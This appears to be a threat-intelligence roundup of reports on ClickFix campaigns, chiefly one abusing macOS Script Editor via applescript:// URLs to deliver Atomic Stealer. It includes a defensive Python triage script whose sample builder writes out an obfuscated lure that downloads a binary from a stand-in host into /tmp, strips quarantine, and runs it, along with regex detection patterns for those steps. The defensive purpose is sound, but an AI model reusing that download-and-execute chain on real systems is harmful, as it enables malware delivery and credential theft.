Attack Vector Evolution
Comparison of execution methods used in ClickFix malware campaigns
Primary Sources
New ClickFix attack bypasses Mac Terminal protections
Jamf Threat Labs recently uncovered a new ClickFix cyberattack going after Mac users. Until now, the risk came from copying and pasting a script into Terminal. In this campaign, cybercriminals trigger the ClickFix chain when you click a button on a fake website. Let’s dive in to understand how attackers do this and how you can keep your Mac safe.

Jamf spots an AMOS stealer campaign significantly changing the ClickFix flow

Recently, Jamf Threat Labs discovered a new ClickFix-style macOS attack distributing the Atomic Stealer (AMOS). The attack targeted Mac users looking for technical solutions to common macOS issues, such as cleaning up their disk.

Neither the stealer nor the fake “Common Mac troubleshooter guide” websites are new techniques. Both the malware and the fake pages have been used extensively against Mac computers in the past. What is new is the ClickFix flow: it is shorter, faster, and harder to spot. This ClickFix-style attack “stood out immediately because it ditched the typical Terminal-based execution entry point entirely,” Jamf Threat Labs reported.

Jamf Threat Labs shared a screenshot of the ClickFix instructions users saw on the fake site, which is now offline. The page carries fake Apple logos and a single “Execute” button that triggers the attack. (Screenshot: Moonlock.)

As a quick reminder, classic ClickFix attacks depend entirely on what the victim does when handed a malicious script: they require that you open Terminal and copy and paste the script there. In this campaign, however, Jamf Threat Labs found that cybercriminals use other built-in Mac tools to automate that step. As a result, the attack works with the push of just two buttons, has a smoother social engineering flow, and is faster.
Jamf Threat Labs explained that the threat campaign used macOS Script Editor, which has a well-documented history as a malware delivery mechanism. The notable aspect, they said, is the use of a URL scheme to invoke Script Editor. Let’s look at what this means and how the attack works.

How the new AMOS ClickFix attack works

The way this new AMOS campaign works is simple, and what users see when they interact with this threat can be summarized in just a couple of steps. In a way, simpler is more worrying, bec...
The Script Editor Shift: How ClickFix Evades macOS 26.4 Security to ...
[Figure: Prompt to open Script Editor. Image: Jamf Threat Labs]

In the ever-evolving game of digital cat-and-mouse, Jamf Threat Labs has identified a clever adaptation of the notorious “ClickFix” attack strategy. Traditionally, these campaigns trick users into pasting malicious commands into the Terminal, but as security friction increases, threat actors are shifting their sights to a different built-in macOS tool: Script Editor. This new campaign effectively sidesteps recent macOS security enhancements while maintaining the same dangerous endgame: infecting systems with the Atomic Stealer infostealer.

The hallmark of ClickFix has long been convincing a user to copy and paste a command into the Terminal under the guise of system maintenance. However, Apple introduced a specific security feature in macOS 26.4 that “scans commands pasted into Terminal before they’re executed,” creating a meaningful hurdle for attackers. As Jamf Threat Labs notes, “when one door closes, attackers find another”. This campaign ditches the Terminal-based entry point entirely, instead leveraging the applescript:// URL scheme to automatically launch the macOS Script Editor.

The attack begins with a familiar social engineering lure, such as a fake browser update or a “fix” for a non-existent system error. When the victim follows the instructions, the following chain unfolds:

1. URL scheme invocation: the attacker uses a URL starting with applescript:// to make the system open Script Editor with a pre-loaded command.
2. The first stage: the initial script is small and obfuscated, typically using “base64 encoding combined with gzip compression to obscure its contents before execution”.
3. The retrieval: once executed, this first stage runs a curl command to download a second-stage payload, identified as a Mach-O binary, to the /tmp directory.
4. Final execution: the script then “removes extended attributes, sets execution permissions and executes” the binary, which Jamf has identified as a recent Atomic Stealer variant.

By shifting the execution environment, attackers gain two major advantages. First, they avoid the new “paste-and-scan” protections built into the macOS Terminal. Second, they maintain a “familiar delivery mechanism” while quietly changing how and where the malicious command actually runs. This “small adjustment with a meaningful impact” allows the campaign to remain effective against users who may have been trained to be wary of the Terminal, but see the Script Editor as a more ...
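The four-step chain above, and the two-click flow in the Moonlock excerpt earlier, can be turned into a triage check. The Python below is an added example written for this page; it is not code from Jamf Threat Labs, Moonlock, or SecurityOnline, and nothing in it comes from the campaign itself. It assumes the applescript:// URL carries its script in a `script=` query parameter after `com.apple.scripteditor?action=new` (that parameter layout is an assumption, not something the page states). The lure it decodes is constructed inline using the reserved `example.invalid` hostname, so the script runs offline.

```python
"""Triage helper for a ClickFix-style applescript:// lure (added example).

Pulls the inline script out of an applescript:// URL, peels the base64 + gzip
layering the reported first stage uses, and flags the behaviours the chain
exhibits: curl download into /tmp, quarantine attribute removal, chmod, and
execution of the dropped file.
"""
import base64
import gzip
import re
from urllib.parse import parse_qs, quote, urlparse

# Behaviours of the reported chain, expressed as regexes over decoded text.
INDICATORS = {
    "downloads_to_tmp": re.compile(r"\bcurl\b[^\n;|]*\s(?:-o|--output)\s+/tmp/", re.I),
    "strips_quarantine": re.compile(r"\bxattr\s+(?:-c|-d\s+com\.apple\.quarantine)\b", re.I),
    "sets_exec_bit": re.compile(r"\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\b", re.I),
    "runs_from_tmp": re.compile(r'(?:^|[;&|]\s*|do shell script\s+")\s*/tmp/\S+', re.I | re.M),
}

# Long base64 runs are candidate nested stages.
_B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def extract_script_from_url(url: str) -> str:
    """Return the inline script carried by an applescript:// URL.

    Assumed parameter layout (an assumption, not taken from the page):
    applescript://com.apple.scripteditor?action=new&script=<percent-encoded text>
    """
    parsed = urlparse(url)
    if parsed.scheme.lower() != "applescript":
        raise ValueError("not an applescript:// URL")
    params = parse_qs(parsed.query)  # percent-decodes the value for us
    return params.get("script", [""])[0]


def deobfuscate_stage(blob_b64: str) -> str:
    """Reverse the base64 (and, when present, gzip) layering of a stage."""
    raw = base64.b64decode(blob_b64, validate=True)
    if raw[:2] == b"\x1f\x8b":  # gzip magic bytes
        raw = gzip.decompress(raw)
    return raw.decode("utf-8", errors="replace")


def analyze(script: str, depth: int = 0) -> dict:
    """Flag indicators in the script and in any base64 blob embedded in it."""
    hits = {name: bool(rx.search(script)) for name, rx in INDICATORS.items()}
    if depth < 3:  # bounded recursion into nested stages
        for blob in _B64_RUN.findall(script):
            try:
                inner = deobfuscate_stage(blob)
            except Exception:  # not really base64/gzip: skip this run
                continue
            for name, hit in analyze(inner, depth + 1).items():
                hits[name] = hits[name] or hit
    return hits


def is_clickfix_like(hits: dict) -> bool:
    """Three or more of the four behaviours together is the reported pattern."""
    return sum(hits.values()) >= 3


def build_sample_url() -> str:
    """Constructed lure for testing; example.invalid is a reserved hostname."""
    stage2 = (
        "curl -fsSL https://example.invalid/update -o /tmp/update\n"
        "xattr -c /tmp/update\n"
        "chmod +x /tmp/update\n"
        "/tmp/update &\n"
    )
    blob = base64.b64encode(gzip.compress(stage2.encode())).decode()
    stage1 = f'do shell script "echo {blob} | base64 -d | gunzip | sh"'
    return "applescript://com.apple.scripteditor?action=new&script=" + quote(stage1, safe="")


if __name__ == "__main__":
    hits = analyze(extract_script_from_url(build_sample_url()))
    for name, hit in hits.items():
        print(f"{name:18} {'HIT' if hit else '-'}")
    print("clickfix-like:", is_clickfix_like(hits))
```

The regexes encode only the variant reported here; a different drop directory, a different attribute-stripping command, or a payload that is not base64 or gzip wrapped will slip past them, so treat a negative result as "not this pattern" rather than "clean". The decoded stage is what should be preserved as evidence, since the URL itself is the only artifact the browser history retains.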
EVALUSION Threat Cluster Uses Fake ClickFix Tools to Push Dual Malware ...
A malware campaign tied to the EVALUSION threat cluster is abusing fake ClickFix utilities to deploy Amatera Stealer or NetSupport RAT. The attackers use staged loaders and Microsoft-themed deception to harvest credentials, seize remote access, and evade detection through familiar-looking executables.
ClickFix Campaign on macOS Leverages Script Editor Over Terminal
A new ClickFix campaign targets macOS by abusing Script Editor instead of Terminal, using social engineering to deliver Atomic Stealer malware and steal sensitive data.
